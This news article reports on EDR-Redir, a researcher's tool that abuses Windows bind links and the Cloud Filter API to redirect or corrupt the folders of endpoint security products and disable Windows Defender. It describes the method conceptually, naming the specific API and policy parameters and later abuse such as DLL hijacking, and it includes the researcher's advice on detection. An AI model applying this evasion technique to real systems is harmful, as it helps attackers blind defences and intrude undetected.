A cybersecurity researcher has unveiled EDR-Redir, a new tool that exploits Windows bind filter and cloud filter drivers to compromise Endpoint Detection and Response (EDR) systems.
The technique redirects EDR executable folders to attacker-controlled locations, enabling code injection or complete service disruption without requiring kernel-level privileges.
Exploiting Windows Bind Link Feature for EDR Bypass
The attack leverages Windows Bind Link, a feature introduced in Windows 11 version 24H2 that enables filesystem namespace redirection through virtual paths.
Unlike traditional symbolic links that current EDRs actively monitor and block, bind links operate at the minifilter driver level using bindflt.sys.
This allows transparent folder redirection that appears legitimate to security software.
When EDR-Redir creates a bind link, it only performs “OPEN” and “READ” operations, which administrators inherently possess permissions for on EDR executable folders.
The researcher demonstrated successful attacks against Elastic Defend and Sophos Intercept X, redirecting their executable folders to attacker-controlled directories.
When bind link redirection failed against Windows Defender due to its enhanced protections, the researcher developed an alternative approach using the Windows Cloud Filter API.
Performing an incomplete sync root registration with CfRegisterSyncRoot using nearly empty CF_SYNC_POLICIES parameters, the tool can corrupt the target folder.
This technique successfully blocked Windows Defender from accessing its operational directory.
The corrupted sync root persists across system reboots, eliminating the need for scheduled tasks or services to maintain the attack.
After registration, Defender services become unable to start, effectively disabling the antivirus without triggering typical security alerts.
Once attackers control EDR executable folders, they can drop malicious DLL files for hijacking, place executable files that the EDR will unknowingly execute, or leave folders empty to prevent EDR operation during the next boot cycle.
The EDR-Redir tool is available on GitHub, raising concerns about widespread exploitation. Since the technique operates entirely at the minifilter driver level, traditional user-mode monitoring generates limited security events, making detection extremely challenging.
While bind links don’t persist after reboot, attackers can establish persistence through startup tasks.
The researcher emphasizes that defense primarily requires EDRs to enhance folder protection mechanisms and implement monitoring for bind filter and cloud filter driver activities.
This discovery highlights a critical gap in current EDR security architectures that vendors must address urgently.
Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today
.webp?resize=1600,900&ssl=1&description=The technique redirects EDR executable folders to attacker-controlled locations, enabling code injection or complete service disruption without requiring kernel-level privileges.){kind=link}